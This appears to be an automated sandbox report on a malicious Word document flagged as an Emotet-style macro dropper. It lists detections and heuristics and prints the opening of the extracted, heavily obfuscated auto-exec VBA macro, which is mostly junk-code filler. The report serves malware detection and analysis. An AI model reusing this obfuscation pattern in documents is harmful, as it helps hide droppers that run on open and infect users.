Verdict: MALICIOUS
Risk Score: 322

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a Microsoft Office document containing a large, obfuscated VBA macro. Critical heuristics indicate an auto-exec loader that uses `Shell()` and `CreateObject` calls, the typical sinks for executing malicious code from a macro. The macro's obfuscation and auto-execution suggest it is designed to download and run a secondary payload, hence the T1204.002 'Malicious File' mapping. No specific family could be identified due to the heavy obfuscation.
Heuristics (8)
- ClamAV: Doc.Dropper.Emodldr-6755244-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
- VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 5bcdc68886240376aa32793e2888fe8d915143300b9dbbe33412bf65eeecacf2) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 191259 bytes |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function lQBhI(QgZsRoh As String) As String
For arMdvS = 0 To 6
TOMcuAx = Left("SX!HhA^oeki&(rS)M)U", 3)
MjlOffub = UCase("DMJ@cDqj*k#")
WxzIfMAMRI = Space(15)
Next arMdvS
For rEaJDI = 0 To 7
SrDSbfWX = Space(4)
MjlOffub = LTrim("neyf.NfZfEjO(aR@[")
Gearou = RTrim("?PnisMkFMEqdn")
MjlOffub = "oCugn@aGcvdMTHX#T" + "g]l%fu%SP^(Gq^yG" + "^x_mwKb_tESX*PyKQ"
TOMcuAx = 1580 + 653 + 619
Next rEaJDI
For yRIafu = 0 To 4
For OzTfop = 0 To 10
YKauGnZSZBql = Space(7)
WcvlXCfZ = Left("dr(Yxz-o-H.s%!NcOpE", 4)
Pymuh = UCase("nG)f]hgnGRG#nQ")
Next OzTfop
HeaPC = 668 + 182 + 534
JWbkwLTLNw = Space(17)
bjoqji = "F$Iv.l_C^kBzTAk@PpE" + "Ua[*%MLsc]y" + "r*Ym$^m)]T"
RBUcdYv = LTrim("RIGJ znIxLyjbc")
Next yRIafu
JoieuruIjmNt = StrReverse("r$Anqc]jC&Kj")
For HvApSk = 0 To 4
While XBQWIU < 4
TOMcuAx = Left("YX_XV#i!&eRmzXrCS (R", 5)
QBtge = Space(17)
XBQWIU = XBQWIU + 3
Wend
RBUcdYv = Right("f ]xd#Z-Mxzd^N&", 3)
RBUcdYv = StrReverse("c$s nL?$Sev!]Ebl%gU")
QBtge = 1982 + 960 + 629
WcvlXCfZ = UCase("!jXt]trvrk_iNOE")
TOMcuAx = Right("!GYMJbBELk", 2)
SrDSbfWX = Left("a!Hv[ZYG!.Lg", 3)
JWbkwLTLNw = 1442 + 1289 + 1998
RBUcdYv = Space(2)
Gearou = UCase("s$YrmofrBG")
Next HvApSk
WcvlXCfZ = StrReverse("uQC@NgZf-k")
JWbkwLTLNw = RTrim("Vm.#ucVr.!)Gs")
HeaPC = Left("tBWjgQ$PfTrOpxk", 5)
MjlOffub = UCase("IZml[$q#UT!rG-t?c")
While wYuSun < 4
While XTMhbN < 1
HeaPC = 1537 - 918 - 1749
JWbkwLTLNw = LTrim("n$FKJbnxKV#rhosbZ$T.")
bjoqji = StrReverse("NqVNWYDYd$KWcNT")
JoieuruIjmNt = StrReverse("fpigVkf#@yL#B-PcH[$C")
RBUcdYv = StrReverse("*bt.E?bxH^U")
XTMhbN = XTMhbN + 1
Wend
bvOGov = UCase("IaChAiAFsAxi#eC*#W")
YKauGnZSZBql = Right("O A^kWGq# W[ceq", 2)
bvOGov = RTrim("U[)($B*.b$N(Q")
HeaPC = 1454 + 1902 + 1128
RBUcdYv = StrReverse("LsZ %tkRw[xt@%")
SrDSbfWX = RTrim("b(EKQRP#Id!BEHdw")
TOMcuAx = LTrim("euOpEB]IZIXJiKU")
SrDSbfWX = RTrim("[[P%H[LL[^%vpzPX#%")
wYuSun = wYuSun + 1
Wend
Dim nrvWEWfW() As Byte
While gfdJzZ < 4
JoieuruIjmNt = Left("@TjapS)Xxu d!iHf", 3)
JoieuruIjmNt = RTrim("w^Zh^oM rB")
SrDSbfWX = "mBYnLsPryRyiDDaa#MUL" + "em%E gV]UbY-#JNycbO" + "]_]xC]z]FU"
JoieuruIjmNt = 328 - 281 - 1191
TOMcuAx = Right("tjD$zxwW#h]t[#E$(v", 2)
bjoqji = UCase("!lEve@V hg")
HeaPC = Space(5)
gfdJzZ = gfdJzZ + 1
Wend
While orJPMk < 4
While YvfCbp < 1
SrDSbfWX = 433 - 476 - 919
TOMcuAx = UCase("xGit#HopzFbG&mwJe!r")
YvfCbp = YvfCbp + 1
Wend
Gearou = 1127 + 1421 + 1612
JWbkwLTLNw = Space(14)
RBUcdYv = UCase("rsKqvPecHhSnb")
RBUcdYv = "LucwKFvFYpYNSxeV" + "w_uR#K-!MPzA^K" + "gNt.lm!rmPW]N)s[ZmHw"
RBUcdYv = Left("O]mq&radrvKe$", 2)
bjoqji = UCase("#xlypymHrGoq^zRbjyx")
bvOGov = Right("w_EhIDK[kZQ@frP", 4)
Pymuh = 820 + 186 + 344
RBUcdYv = 1210 + 435 + 935
orJPMk = orJPMk + 2
Wend
For PLxNaU = 0 To 9
RBUcdYv = "i*MN)goNES-u[W" + "zCEDR%hyiJGz" + "bdDksX @_sGrNrf"
YKauGnZSZBql = 1349 + 108 + 1545
WcvlXCfZ = UCase("#cleFArL_cGfLairTn")
JoieuruIjmNt = 879 - 1197 - 1285
Next PLxNaU
For RlkGhY = 0 To 4
For pfKldA = 0 To 7
SrDSbfWX = 1255 - 946 - 1792
Gearou = RTrim("RndNUZHdHcsPRa&")
JoieuruIjmNt = "-(]eTtcyHk]yb" + "d@SjLEGGPbbGEU" + "Jphcl%@xY@blPis#SL?$"
QBtge = 498 - 1947 - 1928
WxzIfMAMRI = 1686 + 1389 + 480
... (truncated)